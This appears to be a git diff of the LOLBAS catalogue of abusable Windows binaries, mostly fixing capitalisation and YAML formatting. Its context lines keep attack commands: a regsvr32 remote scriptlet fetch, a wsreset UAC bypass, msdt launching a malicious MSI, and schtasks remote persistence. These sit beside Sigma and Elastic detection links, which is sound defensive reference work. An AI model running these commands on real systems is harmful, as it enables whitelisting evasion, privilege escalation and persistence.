XML file. Usecase: Compile and run code - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -60,7 +60,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Msbuild.exe should not normally be executed on workstations Resources: - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md @@ -77,4 +77,3 @@ Acknowledgement: Handle: '@Cneelis' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 6b59858..c4ce1c1 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 7f65131..17d027c 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,7 @@ Commands: - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2f68ca7..43717d7 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -69,4 +69,3 @@ Acknowledgement: Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index c9bc676..12722c9 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -51,4 +51,3 @@ Acknowledgement: Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index b8f459c..b004ed2 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 7163688..c750fc0 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@subtee' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index fd85398..bcb0ad9 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -19,4 +19,3 @@ Detection: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..f49529e 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -21,4 +21,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index e61cf7b..be79c37 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -38,4 +38,3 @@ Acknowledgement: Handle: '@kylehanslovan' - Person: Fab Handle: '@0rbz_' ---- diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index e1bdc30..3bab933 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 3a0e4af..99b89a6 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: Derek Johnson Handle: '' ---- diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 512ae99..a032008 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\system32\pnputil.exe -Code_Sample: +Code_Sample: - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -22,4 +22,3 @@ Acknowledgement: Handle: '@LuxNoBulIshit' - Person: Avihay eldad Handle: '@aloneliassaf' ---- diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index c5deac3..957ae44 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index ed0405a..215a6e9 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -40,4 +40,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 8dec4db..634c49d 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index ba36c95..56b9bd6 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Leon Rodenko Handle: '@L3m0nada' ---- diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 0caf9b6..459d579 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: FireEye Handle: '@FireEye' ---- diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index dedb202..77b13a0 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml @@ -41,4 +41,3 @@ Resources: Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ---- \ No newline at end of file diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 3e0443b..b48e146 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -36,4 +36,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 5aa2b44..ea30825 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -7,7 +7,7 @@ Commands: - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3febc17..4ea0657 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index a19af48..717ddc5 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Eli Salem Handle: '@elisalem9' ---- diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index f3a98f2..df1653b 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 5b8f856..a0600d3 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -14,7 +14,7 @@ Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 08a9e44..9fcabc7 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -7,14 +7,14 @@ Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -36,7 +36,7 @@ Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe Code_Sample: - - Code: + - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -57,4 +57,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 23a6d3f..aed6a0a 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: elceef Handle: '@elceef' ---- diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 9f6d1bc..aa45372 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -39,4 +39,3 @@ Acknowledgement: Handle: '@splinter_code' - Person: ap Handle: '@decoder_it' ---- diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index bd8acc1..712c8c4 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -91,4 +91,3 @@ Acknowledgement: Handle: '@404death' - Person: Martin Ingesen Handle: '@Mrtn9' ---- diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 0190d5c..349c645 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,6 +1,6 @@ --- Name: Runonce.exe -Description: +Description: Executes a Run Once Task that has been configured in the registry Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 9409e42..ff6cc63 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,6 +1,6 @@ --- Name: Runscripthelper.exe -Description: +Description: Execute target PowerShell script Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -18,7 +18,7 @@ Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Event 4014 - Powershell logging - IOC: Event 400 Resources: @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 3f6fcf3..337c4eb 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -36,4 +36,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 4f3e5b5..3aa7e85 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows - - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily + - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 41def89..b27b18b 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,6 +1,6 @@ --- Name: Scriptrunner.exe -Description: +Description: Execute binary through proxy binary to evade defensive counter measures Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@nicktyrer' ---- diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..480fdcb 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -31,4 +31,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..62a1bcf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Eral4m Handle: '@eral4m' ---- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ffca55a..2f145ff 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 84f92ca..ff72cf1 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Maxime Nadeau Handle: '@m_nad0' ---- diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 2e8ee54..8c58cc1 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -37,4 +37,3 @@ Acknowledgement: Handle: '@oulusoyum' - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..775a788 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -22,13 +22,12 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe Code_Sample: - - Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml Acknowledgement: - Person: Lior Adar Handle: - Person: Hai Vaknin(Lux) Handle: ---- diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index bf5280a..e78b91b 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -1,6 +1,6 @@ --- Name: Verclsid.exe -Description: +Description: Used to verify a COM object before it is instantiated by Windows Explorer Author: '@bohops' Created: 2018-12-04 Commands: @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index a3652cf..5a15a2a 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 303a5fc..42365ae 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -30,4 +30,3 @@ Acknowledgement: Handle: '@Oddvarmoe' - Person: Freddy Handle: '@falsneg' ---- diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index f4271e9..b8737d2 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -88,4 +88,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..667c145 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@YoSignals' - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index e24f33f..7e3161c 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -31,7 +31,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Wscript.exe executing code from alternate data streams - IOC: DotNet CLR libraries loaded into wscript.exe - IOC: DotNet CLR Usage Log - wscript.exe.log @@ -42,4 +42,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: SaiLay(valen) Handle: '@404death' ---- diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index fcab2d3..86522d7 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -7,7 +7,7 @@ Commands: - Command: wsreset.exe Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10 @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: Hashim Jawad Handle: '@ihack4falafel' ---- diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index c5608aa..ada37a0 100644 --- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -18,7 +18,7 @@ Code_Sample: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_wuauclt_network_connection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/f16aca7a353bb01d9862ea1f2a10fa0d866e83c3/rules/windows/process_creation/sysmon_proxy_execution_wuauclt.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml - IOC: wuauclt run with a parameter of a DLL path - IOC: Suspicious wuauclt Internet/network connections Resources: @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 8c01a73..831153c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,6 +1,6 @@ --- Name: Xwizard.exe -Description: +Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -50,4 +50,3 @@ Acknowledgement: Handle: '@harr0ey' - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 5e75f3c..99909eb 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,7 +1,7 @@ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, @@ -62,4 +62,3 @@ Acknowledgement: Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 532c0e7..a044575 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -17,7 +17,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows 10, Windows 11 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl @@ -41,4 +41,3 @@ Acknowledgement: Handle: '@SecurePeacock' - Person: Jose Luis Sanchez Handle: '@Joseliyo_Jstnk' ---- diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 7deb471..ffec91d 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -1,29 +1,28 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: -- Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5d4b41d..0dcc668 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,7 +1,7 @@ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, @@ -31,12 +31,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll @@ -57,4 +59,3 @@ Acknowledgement: Handle: '@0rbz_' - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) Handle: '@pabraeken' ---- diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 7d8bc1b..2423263 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -1,12 +1,12 @@ --- Name: Ieframe.dll Description: Internet Browser DLL for translating 